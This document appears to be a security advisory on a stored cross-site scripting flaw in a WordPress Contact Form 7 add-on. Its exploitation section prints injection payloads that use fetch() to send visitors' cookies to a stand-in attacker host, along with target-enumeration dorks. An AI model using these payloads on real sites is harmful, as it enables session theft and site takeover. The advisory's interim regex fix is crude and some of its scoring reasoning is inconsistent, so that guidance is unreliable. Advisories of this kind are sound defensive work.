Executive Summary

CVE-2026-12801 is a stored cross-site scripting (XSS) vulnerability in the WordPress plugin Ultra Addons for Contact Form 7, affecting all versions up to and including 3.5.43. The flaw resides in insufficient input sanitization and output escaping of the Range Slider component's 'data-label' and 'data-separator' attributes, allowing authenticated attackers with contributor-level access or higher to inject arbitrary web scripts. When exploited, injected scripts execute in the context of any user visiting the compromised page, potentially leading to session hijacking, privilege escalation, and malware distribution within the WordPress environment.

Technical Analysis

The vulnerability is rooted in the Range Slider module of the Ultra Addons for Contact Form 7 plugin. The plugin renders a range slider form field with two configurable attributes: data-label and data-separator. These attributes are used to display custom labels and numeric separators within the slider user interface.

The plugin fails to properly sanitize user-supplied input before storing it within these HTML attributes, and critically, fails to escape the values during output rendering. An attacker who can configure a Contact Form 7 form (achievable with contributor-level access in WordPress) can embed a malicious payload such as:

data-label="x" onmouseover="alert(document.cookie)" data-sep=">"

or more sophisticated payloads using event handlers like onfocus, onerror, or onmouseover, or by breaking out of the attribute entirely with "><script>...</script>.

The stored nature means the payload persists within the WordPress database and executes whenever any user loads the affected form page. Because WordPress does not enforce strict capability isolation for form configuration at the contributor level, low-privileged accounts can serve as the initial attack vector.

The attack surface includes all public-facing WordPress sites running the vulnerable plugin version, particularly those using Contact Form 7 for lead generation, contact pages, or registration forms. The vulnerable attributes are processed server-side during form rendering, making the injection point universally accessible across all pages containing the slider element.

Exploitation Scenarios

Attack Chain for CVE-2026-12801:

1) Reconnaissance and Target Identification

  • An attacker enumerates WordPress sites using Shodan or similar search engines with dorks targeting Contact Form 7 installations: http.component:"wordpress" http.body:"wp-content/plugins/ultra-addons".
  • Attacker uses WPScan or manual checks to fingerprint the Ultra Addons plugin version by requesting /wp-content/plugins/ultra-addons/readme.txt and inspecting the "Stable tag" field.
  • Target sites running version 3.5.43 or earlier become candidates.

2) Authentication and Privilege Validation

  • Attacker obtains contributor-level credentials through credential stuffing, phishing, or by registering on sites allowing open user registration.
  • Contributor-level access is sufficient — no administrator rights required. Many WordPress sites with user registration enabled grant contributor or author roles by default.

3) Trigger Construction and Payload Injection

  • Attacker navigates to the Contact Form 7 editor (WP Admin → Contact → Add New) or directly edits an existing form.
  • Attacker inserts a Range Slider field using the Ultra Addons block/element.
  • Within the field configuration, attacker sets the label attribute to a malicious value:
    "><script>fetch('https://attacker.example/steal?c='+document.cookie)</script>

  • Alternatively, uses an event handler payload: x" onmouseover="fetch('//attacker.example/exfil?c='+document.cookie) — this executes on mouseover, avoiding immediate detection.
  • Attacker saves the form. The payload is stored in the database (wp_postmeta or serialized form settings).

4) Execution and Payload Trigger

  • Any visitor, including site administrators, loads the page containing the compromised form.
  • The Range Slider component renders, and the embedded JavaScript executes within the visitor's browser session.
  • Payload fires silently in the background or upon user interaction (mouseover on the slider element).

5) Post-Exploitation Impact

  • Session Hijacking: Attacker steals administrator cookies, enabling full admin account takeover.
  • Privilege Escalation: With admin session, attacker installs backdoor plugins, creates rogue admin accounts, or modifies site content.
  • Malware Distribution: If site content is manipulated, visitors can be served drive-by downloads or phishing pages.
  • SEO Poisoning: Attacker injects hidden links or spam content affecting site reputation and search engine rankings.
  • Lateral Movement: If WordPress is hosted on shared infrastructure, attacker may pivot to other services (database credentials, server files, adjacent applications).

Impact Assessment

Business Impact: High for affected organizations. Stored XSS enables persistent compromise of the web application's trust boundary. Attackers with only contributor access can escalate to full administrative control of the WordPress instance, potentially leading to complete site defacement, data theft, or use of the server as a launchpad for further attacks.

Affected Systems: All WordPress installations using Ultra Addons for Contact Form 7 version ≤ 3.5.43. The plugin's user base includes small-to-medium enterprises, e-commerce stores, and service providers relying on Contact Form 7 for communication.

Blast Radius:

  • Confidentiality (Low): The CVSS vector scores confidentiality impact as Low — attacker-controlled scripts can read data present in the page context (form submissions, admin-visible data).
  • Integrity (Low): Injected scripts can modify page content or form behavior for visitors.
  • Availability (None): No direct denial-of-service impact from this vulnerability.
  • Scope (Changed): The vulnerability allows impact beyond the vulnerable component — the malicious script operates in the browser context of arbitrary users, not just the component's own context.

CVSS Rationale: The 6.4 (Medium) score reflects: Network access (AV:N), low attack complexity (AC:L), low privilege requirement (PR:L — contributor account needed), no user interaction (UI:N), and changed scope (S:C) since the injected code executes in a different security context (visitor browsers) than the vulnerable form editor.

Exploitation Likelihood: Moderate. Requires an authenticated account, but contributor-level accounts are commonly obtainable on sites with open registration or through credential compromise. The lack of sanitization makes exploitation straightforward once access is gained.

Mitigation & Patch Guidance

Patch Confidence: 0/4 — UNPATCHED. No vendor fix or patched version has been identified. The NVD description confirms all versions up to 3.5.43 are vulnerable, and no subsequent patched release exists in tracked sources.

Immediate Mitigations (implements now):

  1. Disable the Range Slider component: If the site does not use range slider fields, deactivate the Ultra Addons plugin entirely or remove the Range Slider module if selective disabling is available.
  2. Restrict form editing privileges: Review and audit all WordPress user roles. Revoke contributor-level access for untrusted users. If user registration is open, consider disabling it or restricting registrations to subscriber role only.
  3. Web Application Firewall (WAF) rules: Deploy virtual patching via WAF (e.g., Cloudflare, AWS WAF, ModSecurity) with rules blocking POST requests containing data-label or data-separator combined with HTML/JavaScript patterns.
  4. Content Security Policy (CSP): Implement a strict CSP header that disallows inline script execution (script-src 'none' or allowlist only trusted external domains). This mitigates the execution impact even if injection occurs.
  5. Monitor for indicators: Actively search web server logs for POST requests to form configuration endpoints containing suspicious attribute values.

Patch/Upgrade Steps:

  1. Monitor vendor releases: Check the WordPress plugin repository for Ultra Addons updates (https://wordpress.org/plugins/ultra-addons/). Subscribe to security advisories from the WordPress plugin security team.
  2. Version verification: When a patched version is released, upgrade immediately. Verify installed version via WP Admin → Plugins or wp plugin list via WP-CLI.
  3. Interim code fix: Until official patch, apply a mitigation snippet to the theme's functions.php:
    add_filter('the_content', function($content) {
        return preg_replace('/data-label="[^"]*["<]/', 'data-label="sanitized"', $content);
    }, 10, 1);

Long-Term Hardening:

  1. WordPress security baseline: Enforce strong passwords, implement two-factor authentication (2FA) for all administrative and contributor accounts.
  2. Principle of least privilege: Audit all user roles quarterly. Limit contributor assignments to only trusted personnel.
  3. Plugin hygiene: Regularly review installed plugins; remove unused ones. Enable automatic updates where possible.
  4. Server-side hardening: Implement web server input validation at the reverse proxy level for known WordPress plugin attack patterns.
  5. Logging and monitoring: Enable centralized logging with alerting for repeated 400/403 status codes from form configuration endpoints.
